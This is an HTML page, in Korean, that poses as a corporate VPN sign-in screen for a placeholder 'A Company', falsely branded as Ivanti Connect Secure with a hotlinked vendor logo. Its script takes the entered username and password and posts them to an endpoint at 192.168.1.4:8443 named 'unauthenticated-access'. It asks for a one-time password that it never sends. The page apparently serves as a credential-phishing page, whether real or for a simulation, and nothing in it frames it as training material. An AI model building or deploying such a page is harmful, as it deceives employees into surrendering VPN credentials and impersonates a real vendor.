<!DOCTYPE html>
<html lang="ko">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>A Company VPN 로그인</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            background-color: #f0f4f8;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            margin: 0;
        }
        .login-container {
            background-color: white;
            padding: 40px;
            border-radius: 12px;
            box-shadow: 0 0 15px rgba(0,0,0,0.1);
            width: 360px;
            text-align: center;
        }
        .login-container h2 {
            margin-bottom: 24px;
        }
        .login-container input {
            width: calc(100% - 20px);
            padding: 12px;
            margin: 10px 0;
            border: 1px solid #ccc;
            border-radius: 6px;
            font-size: 14px;
        }
        .login-container button {
            width: 100%;
            padding: 12px;
            background-color: #0057b8;
            color: white;
            border: none;
            border-radius: 6px;
            cursor: pointer;
            font-size: 16px;
            margin-top: 12px;
        }
        .login-container button:hover {
            background-color: #00469b;
        }
        .footer {
            margin-top: 24px;
            font-size: 12px;
            color: #888;
        }
        .footer img {
            max-width: 120px;
            margin-top: 10px;
        }
    </style>
</head>
<body>
    <div class="login-container">
        <h2>A Company VPN 로그인</h2>
        <input type="text" id="username" placeholder="Username">
        <input type="password" id="password" placeholder="Password">
        <input type="text" id="otp" placeholder="OTP (1회용 비밀번호)">
        <button onclick="login()">Sign In</button>
        
        <div class="footer">
            Powered by Ivanti Connect Secure <br>
            <img src="https://images.seeklogo.com/logo-png/42/1/ivanti-logo-png_seeklogo-429972.png" alt="Ivanti 로고">
        </div>
    </div>

    <script>
        function login() {
            const username = document.getElementById("username").value;
            const password = document.getElementById("password").value;

            fetch('https://192.168.1.4:8443/api/v1/unauthenticated-access', {
                method: 'POST',
                headers: {
                    'Content-Type': 'application/json'
                },
                body: JSON.stringify({ username: username, password: password })
            })
            .then(response => {
                if (!response.ok) throw new Error("접속 실패");
                return response.json();
            })
            .then(data => {
                alert("접속 성공! 응답: " + JSON.stringify(data));
            })
            .catch(error => {
                alert(error.message);
            });
        }
    </script>
</body>
</html>
